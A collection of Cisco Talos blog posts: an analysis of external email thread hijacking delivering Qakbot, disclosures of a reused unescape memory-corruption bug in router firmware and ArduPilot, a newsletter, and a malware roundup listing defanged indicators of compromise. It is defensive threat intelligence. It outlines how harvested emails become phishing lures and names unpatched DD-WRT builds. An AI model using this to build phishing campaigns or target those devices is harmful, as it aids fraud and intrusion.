Cisco Talos has observed threat actors using external thread hijacking, a method by which attackers weaponize emails previously harvested from other organizations. This differs from the more common approach to thread hijacking, in which adversaries compromise the victim organization’s Exchange server to obtain email threads that are then weaponized. We recently observed this in June 2022 as part of a broader campaign that delivered the Qakbot banking trojan. In this threat activity, the attackers used old emails harvested months to years ago during the 2021 ProxyLogon campaign, tracked as CVE-2021-26855, targeting vulnerable Exchange servers. 

External thread hijacking is not dependent on the threat actor gaining initial access to the victim environment. This is notable from a digital forensics and incident response (DFIR) perspective because the target organization only saw inbound phishing emails with its own legitimate emails as the source material, with multiple external organizations represented in the email threads. Our assessment of the adversary’s use of emails obtained from the ProxyLogon compromises is based on a number of observations, including the timing of the emails and research into publicly acknowledged ProxyLogon compromises. The attackers selectively used these emails to target senders or recipients from the target organization. 

In the external thread hijacking attack observed by CTIR, the adversary likely took the following steps:  

  1. The attacker took control of multiple third-party organizations’ Exchange servers or individual inboxes and exported emails for later use. The adversary selected the emails relevant to the target organization from the email dumps. This could have been accomplished with a regex search for “[@]company[.]com” in the “To” or “From” fields, although we did not directly observe the adversary’s selection process.  
  2. With the emails selected, the adversary ran a script to format the text of each legitimate thread into a phishing email by adding malicious content. 
  3. The attacker then sent the phishing emails to the original “[@]company[.]com” address in each legitimate thread from many adversary-controlled external mailboxes, completing the phishing attack. 

See the graphic below for a visual depiction of those steps. Note that the graphic shows only one third-party organization for simplicity, but emails harvested from multiple external organizations were involved in the attack observed by Cisco Talos.  



Victim thread hijacking 

To help showcase the unusual nature of the external thread hijacking, a brief breakdown of the more common victim thread hijacking is instructive. In 2021 and early 2022, adversary methods for thread-hijacking primarily depended on access to a victim’s Exchange server or individual email account. Most recently, this was seen in an IcedID campaign in early 2022 where the adversary compromised a victim’s Exchange server and used it as a base of operations to craft and send malicious emails based on recent legitimate email threads. 

In the past, in a standard malspam campaign delivering IcedID, an attacker would have taken control of the target organization’s Exchange server, then hijacked threads between internal users and/or their external partners. The key point is that the victim’s Exchange server served as both the source for the legitimate email thread and the sender for the malicious reply. These attacks were usually conducted immediately post-compromise, or shortly after. 

In a victim thread hijacking attack, the adversary would take the following steps: 

  1. Take control of the target organization’s Exchange server via ProxyLogon or another Exchange vulnerability. 
  2. The adversary would then use a legitimate email to craft a reply, inserting malicious content. Next, the adversary would send a malicious reply to the target user via the target organization’s Exchange server. This step of the attack would work equally well for internal-to-internal and internal-to-external phishing. 
  3. The target user, seeing the legitimate sender, source and thread history of the email, would be reasonably likely to click the link, thereby executing the IcedID payload on the system. 



Regarding the malware delivered in this campaign, there are numerous Snort rules and ClamAV signatures users can deploy to detect the deployment of Qakbot. While the primary focus of this post is the process by which the attacker delivered this attack, a user infected by this particular campaign faces Qakbot itself, which can steal financial data and login information from targeted systems. It also loads additional malware from its C2 servers, which Snort rules can detect and prevent.

With a clear understanding of the difference between external thread hijacking versus victim thread hijacking, the next question is how to detect external thread hijacking, particularly in the current campaign using emails harvested through ProxyLogon attacks. This is a very relevant topic for DFIR professionals because accurate identification of this attack method might lower the priority of in-depth forensic examination of internal Exchange servers. 


Tips for Defenders 

Look for the following indicators as key signs of the external thread hijacking method: 

  • Spoofed senders. Since the adversary did not have access to the victim’s Exchange server, all emails originate from spoofed, external addresses. 
  • Old email threads, primarily from 2020 and 2021. However, Cisco Talos has observed at least one email thread as recent as May 2022, indicating that the adversary in question is actively using newly harvested emails. 
  • No or very limited internal-to-internal threads. Since the emails were harvested from external sources, there should be very few internal-to-internal threads seen in the legitimate content. 
  • Malformed replies. The adversary concatenated the old, legitimate content with the new, malicious content within the email body. This created a malformed appearance, as seen in the example below. 
  • Partially scrubbed email addresses. The adversary’s script removed some email addresses from the bodies of the legitimate emails during the construction of the malicious emails, as noted in the example below. 
  • Repetitive use of the same harvested legitimate email threads in multiple phishing waves. 
The example below was created by Cisco Talos to avoid displaying identifying information but is highly similar in all aspects to the external thread hijacking emails observed in the wild. 


Conclusion 

By early 2022, the direct effects of ProxyLogon, most famously exploited by the HAFNIUM group, largely quieted down. The external approach to thread hijacking, not necessarily specific to one adversary, appears to be one of the many indirect effects of the widespread compromises that resulted in exfiltration of large volumes of email from 2020 and 2021. Although those emails are relatively old by now, we will likely continue to observe adversaries leveraging bulk email aggregations from multiple organizations to launch focused phishing campaigns. Accurately recognizing the difference between external thread hijacking and victim thread hijacking can potentially avoid incorrect assessment of an incident and save dozens of hours of hunting for an internal breach that does not exist. 

Vulnerability Spotlight: How a code re-use issue led to vulnerabilities across multiple products

27 July 2022 at 16:22


By Francesco Benvenuto. 

Recently, I was performing some research on a wireless router and noticed the following piece of code: 

This unescape function reverts URL-encoded bytes to their original form. But something specifically caught my attention: there was no size check on the operations performed, and the function assumes that a ‘%’ is always followed by two bytes. So, what would happen if only one character existed after the ‘%’? The answer is that the s+3 in the strcpy would access memory after the end of the string, which could lead to memory corruption.
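As an added example, and not the code from the router or from any of the projects named below, here is an in-place unescape that only consumes a ‘%XX’ triple after confirming both hex digits are present, so a trailing ‘%’ or ‘%4’ is left untouched rather than read past the terminator. The function name safe_unescape and the two-pointer layout are my own choices.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Value of a hex digit; caller has already verified isxdigit(c). */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return c - 'A' + 10;
}

/*
 * Decode %XX escapes in place and return the decoded length (excluding
 * the NUL). Both hex digits are checked before the triple is consumed.
 * isxdigit() of the NUL terminator is false and && short-circuits, so
 * for a string ending in "%4" the byte after in[1] that is read is the
 * terminator itself, and for a string ending in "%" in[2] is never
 * read at all. A separate write pointer replaces the tail-shifting
 * strcpy(s, s + 3), so no overlapping copy is performed either.
 * Hypothetical helper written for this post, not the vendor code.
 */
size_t safe_unescape(char *s)
{
    char *in = s;
    char *out = s;

    while (*in != '\0') {
        if (in[0] == '%' &&
            isxdigit((unsigned char)in[1]) &&
            isxdigit((unsigned char)in[2])) {
            *out++ = (char)((hexval(in[1]) << 4) | hexval(in[2]));
            in += 3;
        } else {
            /* Literal byte, or a '%' not followed by two hex digits. */
            *out++ = *in++;
        }
    }
    *out = '\0';
    return (size_t)(out - s);
}

int main(void)
{
    /* Constructed sample inputs, including the truncated-escape case. */
    char well_formed[] = "index.cgi?name=a%41b%2fc";
    char truncated[]   = "index.cgi?name=tail%4";

    safe_unescape(well_formed);
    safe_unescape(truncated);
    printf("%s\n%s\n", well_formed, truncated);
    return 0;
}
```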

Then, I tried to exploit this bug on the router in question. But based on how the URL string was managed in that device, it was not possible. But it had the potential to crash other web servers that used this piece of code. That function belonged to the freshtomato library. So, I searched for the source code and noticed that at the beginning of the file containing that function, there was the following comment: 

It was code from Broadcom. I searched for pieces of those comments on Google and found some projects using that code. Then, I also used grep.app, writing a regex to catch the layout of the bug, and found other projects. Some of these projects were code that could be tested locally and/or used in web server scenarios. So, we tested the code and eventually contacted multiple vendors regarding vulnerabilities in their respective products.

The code utilized by each of the different projects is so similar that it is reasonable to assume it was taken from the same initial source. Seeing as how the code originally held a Broadcom copyright, it is likely that it was part of a reference implementation that Broadcom released to help customers implement an HTTP server using a Broadcom product. This vulnerability becomes more interesting as the vulnerable products are looked at in more depth, including the open-source software ArduPilot. This software is an open-source autonomous vehicle package, not tied to Broadcom in any way, so the vulnerable code made its way into the code base without a direct reference implementation. This sort of extended code reuse is extraordinarily difficult to track down even with modern-day secure coding practices, because the code is slightly modified to suit each use case. For these reasons, it is extraordinarily important for developers to be vigilant in reviewing external functionality that is modified and inserted into a code base, and for security researchers to investigate issues that could easily be slightly mutated across multiple software packages.

Below are the vulnerabilities we disclosed and helped fix as part of this discovery. TALOS-2022-1509, TALOS-2022-1511 and TALOS-2022-1512 have been patched by their respective companies or maintainers. Talos additionally confirmed TALOS-2022-1510 is present in revisions 32270 to at least revision 48599 but was unpatched at the time of publishing, so later versions are also likely vulnerable.


TALOS-2022-1509 (CVE-2022-28664 - CVE-2022-28665) 

A memory corruption vulnerability in the httpd’s unescape functionality of FreshTomato, version 2022.1. A specially crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. 


TALOS-2022-1510 (CVE-2022-27631) 

A memory corruption vulnerability in the httpd’s unescape functionality of DD-WRT from Revision 32270 to Revision 48599 — a Linux-based firmware for embedded systems. Later versions of this product could also be vulnerable, as Talos recently confirmed that the issue was unpatched. A specially crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. 


TALOS-2022-1511 (CVE-2022-26376) 

A memory corruption vulnerability in both the official Asuswrt firmware as well as the Asuswrt-Merlin New Gen open-source firmware alternative for Asus wireless routers. The vulnerability exists in the httpd’s unescape functionality of these firmwares. A specially crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. ASUSWRT, the company’s user interface software for managing Asus devices, is also affected by this vulnerability. 


TALOS-2022-1512 (CVE-2022-28711) 

A memory corruption vulnerability in the cgi.c’s unescape functionality of ArduPilot APWeb from master branch 50b6b7ac to master branch 46177cb9. ArduPilot is an open-source software suite that allows users to program autonomous flying and driving devices like drones. A specially crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. 

Threat Source newsletter (July 28, 2022) — What constitutes an "entry-level" job in cybersecurity?

28 July 2022 at 18:00

By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

Between the White House’s recent meeting, countless conference talks and report after report warning of cybersecurity burnout, there’s been a ton of talk recently around the cybersecurity skills gap and hiring. 

Everyone wants to know the magic ticket to figure out how to increase hiring at their cybersecurity practice without hiring someone with under-developed skills that could leave clients open to attack. This is not a problem exclusive to cybersecurity, but I do find it interesting that there’s been so much talk about the problems the cybersecurity workforce faces and not much about actual solutions.

I think a good place to start would be to change the meaning of what an “entry-level” position truly is in security. I came into this field with zero security experience from the domain of journalism. My family considered me to be “a computer guy” just because I was good at searching the internet for public information as a journalist. Granted, I’m no security expert four years into this, but between internal mentorships and educational support outside of the company, I can at least write a basic ClamAV signature and could talk to a CEO about the difference between ransomware and business email compromise. Imagine what someone who at least knew what Kali Linux was before their first day could do with that same amount of time.

I decided to go on LinkedIn and search for “entry-level” cybersecurity roles by literally clicking a box in the search function. Granted, this could be the LinkedIn algorithm serving me jobs that would be best suited for me based on my level of experience, but I found countless “entry-level” openings that I would not be qualified for based on the qualifications listed in the posting. Even if someone were to apply and still get an interview, who’s to say someone with less experience wouldn’t be deterred from applying in the first place by feeling they were under-qualified?  

One listing (I’m not naming any names) was for an “entry-level” cybersecurity analyst at a mid-size firm. The top requirement was that the candidate has “three-plus years of experience analyzing general cybersecurity-related technical problems" and a bachelor’s degree in “cybersecurity or a related field” and it would be “nice if you have” a master’s degree and several different certifications.  

Another analyst role didn’t ask for a specific number of years’ worth of experience, but it did say the ideal candidate needs: 
  • Strong experience administering endpoint protection. 
  • Strong experience managing email security products. 
  • Familiarity with incident response procedures, identity management and multi-factor authentication. 
I’d be willing to bet there are folks who have years of experience at Talos who don’t have “strong experience” with all of those fields listed above.  And I’ve met team members who didn’t go to college for security — they may have started out in the military or a totally different field before pivoting to security.  

I’m not saying we should let just anyone manage a SOC team for a Fortune 500 company. But if we’re going to build up the next generation of defenders, we do need to widen the scope of what it means to be at the entry-level of cybersecurity. I would encourage hiring managers to take chances on people who don’t have a “traditional” security background and be willing to invest time and money into training employees who are keen and willing but may not have the exact certifications, which can always come later. 

If every “entry-level” job requires years of experience, how is anyone ever actually supposed to get their first job in security? And don’t say “pay your dues at unpaid internships.” 

  

The one big thing 


Since the Russian invasion of Ukraine began, Ukrainians have been under a nearly constant barrage of cyber attacks. Working jointly with Ukrainian organizations, Cisco Talos has discovered a fairly uncommon piece of malware targeting Ukraine — the GoMet backdoor — this time aimed at a large software development company whose software is used in various state organizations within Ukraine. As this firm is involved in software development, we cannot ignore the possibility that the perpetrating threat actor's intent was to gain access to source a supply chain-style attack, though at this time we do not have any evidence that they were successful. 

Why do I care? 

I shouldn’t have to tell you why you should care about Ukraine. But if anything, this attack shows that even though public discussion around the war and follow-on cyber attacks has waned, the threat isn’t going anywhere. 

So now what? 

In this instance, we saw a software company targeted with a backdoor designed for additional persistent access. This access could be leveraged in a variety of ways, including deeper access or launching additional attacks, including the potential for software supply chain compromise. It's a reminder that although the cyber activities haven't necessarily risen to the level many have expected, Ukraine is still facing a well-funded, determined adversary that can inflict damage in a variety of ways — this is just the latest example of those attempts. As always, Talos continually updates our coverage around the threats Ukraine faces and appropriate Cisco Secure protections. 

 

Other news of note


Spyware continues to be a top threat for government officials, politicians and activists. The European Union recently found the NSO Group’s Pegasus spyware installed on several employees’ mobile devices. Apple initially alerted the EU that the devices had indicators of compromise related to the spyware. This led the European Commission to reach out to Israel, asking the country to "prevent the misuse of their products in the EU.” Meanwhile, the Canadian Parliament is investigating if the national police force uses Pegasus as part of its surveillance operations. Previously, the RCMP said it only used Pegasus in severe cases, deploying it 10 times between 2018 and 2020. (Reuters, Politico)  

An attacker claims to have stolen data from more than 5.4 million Twitter users and is selling it on the dark web for $30,000. The seller, using the username "devil," claims the data includes “Celebrities, to Companies, randoms, OGs, etc.” Twitter said it launched an investigation to verify the authenticity of the data and notify any users whose accounts may have been affected. The attacker exploited a vulnerability that was reported to Twitter several months ago through its bug bounty program and has since been fixed. Breached Forums, where the data is listed for sale, is the same site where an attacker leaked 23 TB of data from 1 billion Chinese citizens earlier this year. (Fortune, The Register)

A new malware tool broker known as “Knotweed” has been outed as the source of several spyware attacks and zero-day exploits against Microsoft and Adobe products. Microsoft stated in a new report that it believes the group is “linked to the development and attempted sale of a malware toolset called Subzero, which enables customers to hack into their targets' computers, phones, network infrastructure and internet-connected devices.” Some of the exploits the group sold were recently used in cyber attacks against Austria, Panama and the U.K. (Microsoft, Dark Reading)


Can’t get enough Talos? 


Upcoming events where you can find Talos 


BlackHat U.S. (Aug. 6 - 11, 2022)
Las Vegas, Nevada 

DEF CON U.S. (Aug. 11 - 14, 2022)
Las Vegas, Nevada 

Virtual 

Most prevalent malware files from Talos telemetry over the past week  


MD5: 2915b3f8b703eb744fc54c81f4a9c67f   
Typical Filename: VID001.exe   
Claimed Product: N/A   
Detection Name: Win.Worm.Coinminer::1201 

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: a087b2e6ec57b08c0d0750c60f96a74c     
Typical Filename: AAct.exe     
Claimed Product: N/A       
Detection Name: PUA.Win.Tool.Kmsauto::1201  

MD5: 7bdbd180c081fa63ca94f9c22c457376  
Typical Filename: c0dwjdi6a.dll  
Claimed Product: N/A   
Detection Name: Trojan.GenericKD.33515991 

MD5: 2c8ea737a232fd03ab80db672d50a17a    
Typical Filename: LwssPlayer.scr    
Claimed Product: 梦想之巅幻灯播放器    
Detection Name: Auto.125E12.241442.in02    

Threat Roundup for July 22 - 29

29 July 2022 at 19:08


Talos is publishing a glimpse into the most prevalent threats we've observed from July 22 - 29. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. Five distinct shades are used, with the darkest indicating that no files exhibited the technique behavior and the brightest indicating that the technique behavior was observed in 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name: Win.Dropper.Shiz-9957065-0
Type: Dropper
Description: Shiz is a remote access trojan that allows an attacker to access an infected machine in order to harvest sensitive information. It is commonly spread via droppers or by visiting a malicious site.

Threat Name: Win.Dropper.Tofsee-9957067-0
Type: Dropper
Description: Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the size of the botnet under the operator's control.

Threat Name: Win.Ransomware.TeslaCrypt-9957356-0
Type: Ransomware
Description: TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransom, and eventually, the malware developers released the master key, allowing all encrypted files to be recovered easily.

Threat Name: Win.Virus.Expiro-9957505-0
Type: Virus
Description: Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.

Threat Name: Win.Dropper.Kuluoz-9957187-0
Type: Dropper
Description: Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.

Threat Name: Win.Dropper.DarkComet-9957280-1
Type: Dropper
Description: DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. This malware can download files from a user's machine and contains mechanisms for persistence and hiding. It also sends back usernames and passwords from the infected system.

Threat Name: Win.Trojan.Sality-9957294-1
Type: Trojan
Description: Sality is a file infector that establishes a peer-to-peer botnet. Although it has been prevalent for over a decade, we continue to see new samples that require only marginal attention to keep detection consistent. Once a Sality client has bypassed perimeter security, its end goal is to execute a downloader component capable of running additional malware.

Threat Breakdown

Win.Dropper.Shiz-9957065-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 27 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT
Value Name: 67497551a
27
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: 98b68e3c
27
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: userinit
27
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: System
27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: load
27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: run
27
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: userinit
27
Mutexes Occurrences
Global\674972E3a 27
Global\MicrosoftSysenterGate7 27
internal_wutex_0x000000e0 27
internal_wutex_0x0000038c 27
internal_wutex_0x00000448 27
internal_wutex_0x<random, matching [0-9a-f]{8}> 15
internal_wutex_0x00000640 12
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
*See JSON for more IOCs
Files and or directories created Occurrences
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp 27

File Hashes

*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK


Win.Dropper.Tofsee-9957067-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
Registry Keys Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config4
4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config3
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: Description
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\nxzuqihd
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EOQLHZYU
Value Name: Description
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\eoqlhzyu
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TDFAWONJ 1
Mutexes Occurrences
Global\07ada3c1-08f4-11ed-b5f8-00501e3ae7b6 1
Global\067cf3c1-08f4-11ed-b5f8-00501e3ae7b6 1
Global\08e8d341-08f4-11ed-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
*See JSON for more IOCs
Files and or directories created Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 4
%SystemRoot%\SysWOW64\config\systemprofile:.repos 4
%SystemRoot%\SysWOW64\nxzuqihd 1
%SystemRoot%\SysWOW64\eoqlhzyu 1
%SystemRoot%\SysWOW64\tdfawonj 1
%SystemRoot%\SysWOW64\hrtokcbx 1
%TEMP%\oacsevkh.exe 1
%TEMP%\htrzurov.exe 1
%TEMP%\rzwntxyj.exe 1
%TEMP%\mcilsztg.exe 1

File Hashes


Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA This has coverage

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK


Win.Ransomware.TeslaCrypt-9957356-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLinkedConnections
25
<HKCU>\SOFTWARE\XXXSYS 25
<HKCU>\SOFTWARE\XXXSYS
Value Name: ID
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
25
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'> 24
<HKCU>\Software\<random, matching '[A-Z0-9]{14,16}'>
Value Name: data
24
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hdtjbroygvvb
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: owvhajogulen
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: pyfepfifrjwi
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: xbmnkkfnowvh
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: gulenopvybnq
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: tbqdqvojagik
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hajogulenopv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: mgtbqdqvcoqj
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ulenopvybnqj
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: lpyfepfifrjw
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: epfifrjwiqou
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ifrjwiqouteu
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: teumgtbqdqvo
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: nrxbmnkkfnow
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: whmtlmoxvcsc
1
<HKCU>\SOFTWARE\159643D83772F 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: bmnkkfnowvha
1
<HKCU>\SOFTWARE\159643D83772F
Value Name: data
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: vcscusnnmyjx
1
Mutexes Occurrences
ityeofm9234-23423 25
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
107[.]6[.]161[.]162 25
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
jessforkicks[.]com 25
heizhuangym[.]com 25
infotlogomas[.]malangkota[.]go[.]id 25
csucanuevo[.]csuca[.]org 25
snibi[.]se 25
danecobain[.]com 25
www[.]danecobain[.]com 25
Files and or directories created Occurrences
%ProgramFiles%\7-Zip\Lang\ka.txt 25
%ProgramFiles%\7-Zip\Lang\kaa.txt 25
%ProgramFiles%\7-Zip\Lang\kab.txt 25
%ProgramFiles%\7-Zip\Lang\kk.txt 25
%ProgramFiles%\7-Zip\Lang\ko.txt 25
%ProgramFiles%\7-Zip\Lang\ku-ckb.txt 25
%ProgramFiles%\7-Zip\Lang\ku.txt 25
%ProgramFiles%\7-Zip\Lang\ky.txt 25
%ProgramFiles%\7-Zip\Lang\lij.txt 25
%ProgramFiles%\7-Zip\Lang\lt.txt 25
%ProgramFiles%\7-Zip\Lang\lv.txt 25
%ProgramFiles%\7-Zip\Lang\mk.txt 25
%ProgramFiles%\7-Zip\Lang\mn.txt 25
%ProgramFiles%\7-Zip\Lang\mng.txt 25
%ProgramFiles%\7-Zip\Lang\mng2.txt 25
%ProgramFiles%\7-Zip\Lang\mr.txt 25
%ProgramFiles%\7-Zip\Lang\ms.txt 25
%ProgramFiles%\7-Zip\Lang\nb.txt 25
%ProgramFiles%\7-Zip\Lang\ne.txt 25
%ProgramFiles%\7-Zip\Lang\nl.txt 25
%ProgramFiles%\7-Zip\Lang\nn.txt 25
%ProgramFiles%\7-Zip\Lang\pa-in.txt 25
%ProgramFiles%\7-Zip\Lang\pl.txt 25
%ProgramFiles%\7-Zip\Lang\ps.txt 25
%ProgramFiles%\7-Zip\Lang\pt-br.txt 25
*See JSON for more IOCs

File Hashes


Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK



Win.Virus.Expiro-9957505-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 97 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSISERVER
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ALG
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EHRECVR
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EHSCHED
Value Name: Start
97
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FAX
